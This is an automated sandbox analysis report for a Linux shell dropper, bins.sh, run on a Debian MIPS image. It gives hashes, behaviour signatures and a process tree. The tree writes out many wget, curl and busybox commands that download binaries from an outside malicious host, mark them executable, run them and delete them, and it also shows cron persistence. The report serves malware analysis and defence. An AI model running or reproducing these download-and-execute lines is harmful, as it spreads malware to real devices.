Analysis
-
max time kernel
151s -
max time network
153s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
31-10-2024 10:13
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
98a18e866b60daae3e685f11a1ba8de3
-
SHA1
e75c8b59ac625180b75dc09236815562ee7c7516
-
SHA256
daa972a65e4384ed36b00c3de5b45b5b31f4f5e6d8662bc8e31a6d7f3970ed86
-
SHA512
447380c5ee983ce566fd27ea9b62fb7da4fd0bab865cda320bfd4909ce03ac7a85a62919f6966e0007196ba30b6cac337efe2907d476d09ff680786ec835a33d
-
SSDEEP
192:kc45CiAzRJ0VRYnXJa3IAEb66so0KdzKVRYnX5cAEb664o04vc45Ci6RJ1:kc45CiAzRJxa3IVj6c45Ci6RJ1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 828 chmod 834 chmod 897 chmod 935 chmod 916 chmod 799 chmod 815 chmod 821 chmod 865 chmod 903 chmod 922 chmod 929 chmod 948 chmod 734 chmod 744 chmod 845 chmod 877 chmod 889 chmod 910 chmod 941 chmod -
Executes dropped EXE 7 IoCs
ioc pid Process /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu 735 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 745 sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 800 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo 816 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY 904 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 917 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo 923 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo -
Renames itself 1 IoCs
pid Process 801 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.szHAQb crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/74/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/834/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/814/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/865/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/894/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/899/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/916/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/928/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/942/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/19/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/878/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/885/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/515/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/705/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/879/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/847/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/819/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/852/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/858/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/882/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/898/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/921/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/829/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/906/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/871/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/873/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/784/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/808/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/880/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/903/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/filesystems crontab File opened for reading /proc/3/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/37/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/807/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/838/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/920/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/69/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/830/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/890/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/926/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/933/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/689/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/801/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/841/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/869/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/872/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/332/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/840/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/937/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/12/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/70/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/864/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/893/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/20/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/78/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/703/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/851/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/1/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/702/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/837/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/886/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/940/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/877/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 File opened for reading /proc/680/cmdline ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 -
System Network Configuration Discovery 1 TTPs 61 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 872 wget 895 curl 944 wget 951 wget 888 busybox 839 curl 873 curl 933 curl 939 curl 740 curl 797 busybox 855 busybox 876 busybox 928 busybox 814 busybox 837 wget 885 curl 926 wget 812 wget 832 curl 843 busybox 902 busybox 914 curl 748 wget 852 wget 884 wget 901 curl 920 curl 938 wget 743 busybox 813 curl 829 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 919 wget 853 curl 921 busybox 940 busybox 952 curl 739 wget 820 busybox 827 busybox 915 busybox 900 wget 913 wget 752 curl 826 curl 833 busybox 932 wget 934 busybox 731 busybox 819 curl 830 rm 894 wget 818 wget 825 wget 896 busybox 927 curl 946 busybox 712 wget 721 curl 831 wget 945 curl -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 busybox File opened for modification /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 curl File opened for modification /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo busybox File opened for modification /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY busybox File opened for modification /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo busybox File opened for modification /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu curl File opened for modification /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu busybox File opened for modification /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- System Network Configuration Discovery
PID:712
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:731
-
-
/bin/chmodchmod 777 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu./lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:738
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- System Network Configuration Discovery
PID:739
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/bin/chmodchmod 777 sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6./sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:747
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- System Network Configuration Discovery
PID:748
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- System Network Configuration Discovery
PID:797
-
-
/bin/chmodchmod 777 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15./ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:800 -
/bin/shsh -c "crontab -l"3⤵PID:802
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:803
-
-
-
/bin/shsh -c "crontab -"3⤵PID:805
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:806
-
-
-
-
/bin/rmrm ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:808
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- System Network Configuration Discovery
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:814
-
-
/bin/chmodchmod 777 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo./jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:817
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- System Network Configuration Discovery
PID:818
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- System Network Configuration Discovery
PID:819
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- System Network Configuration Discovery
PID:820
-
-
/bin/chmodchmod 777 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX./iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:822
-
-
/bin/rmrm iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:824
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:827
-
-
/bin/chmodchmod 777 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88./P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:829
-
-
/bin/rmrm P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:830
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- System Network Configuration Discovery
PID:831
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- System Network Configuration Discovery
PID:832
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- System Network Configuration Discovery
PID:833
-
-
/bin/chmodchmod 777 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs./zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:835
-
-
/bin/rmrm zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:836
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- System Network Configuration Discovery
PID:837
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- System Network Configuration Discovery
PID:839
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- System Network Configuration Discovery
PID:843
-
-
/bin/chmodchmod 777 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6./pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:848
-
-
/bin/rmrm pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:849
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- System Network Configuration Discovery
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk./Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:868
-
-
/bin/rmrm Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- System Network Configuration Discovery
PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- System Network Configuration Discovery
PID:876
-
-
/bin/chmodchmod 777 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR./rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:880
-
-
/bin/rmrm rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:881
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- System Network Configuration Discovery
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8./Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:891
-
-
/bin/rmrm Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- System Network Configuration Discovery
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi./wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:898
-
-
/bin/rmrm wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/chmodchmod 777 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY./ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:909
-
-
/bin/chmodchmod 777 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90./Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:911
-
-
/bin/rmrm Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:912
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- System Network Configuration Discovery
PID:913
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- System Network Configuration Discovery
PID:915
-
-
/bin/chmodchmod 777 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15./ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- System Network Configuration Discovery
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:921
-
-
/bin/chmodchmod 777 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo./jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- System Network Configuration Discovery
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX./iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:930
-
-
/bin/rmrm iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- System Network Configuration Discovery
PID:934
-
-
/bin/chmodchmod 777 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs./zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:936
-
-
/bin/rmrm zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:937
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- System Network Configuration Discovery
PID:938
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- System Network Configuration Discovery
PID:939
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6./pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:942
-
-
/bin/rmrm pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- System Network Configuration Discovery
PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- System Network Configuration Discovery
PID:945
-
-
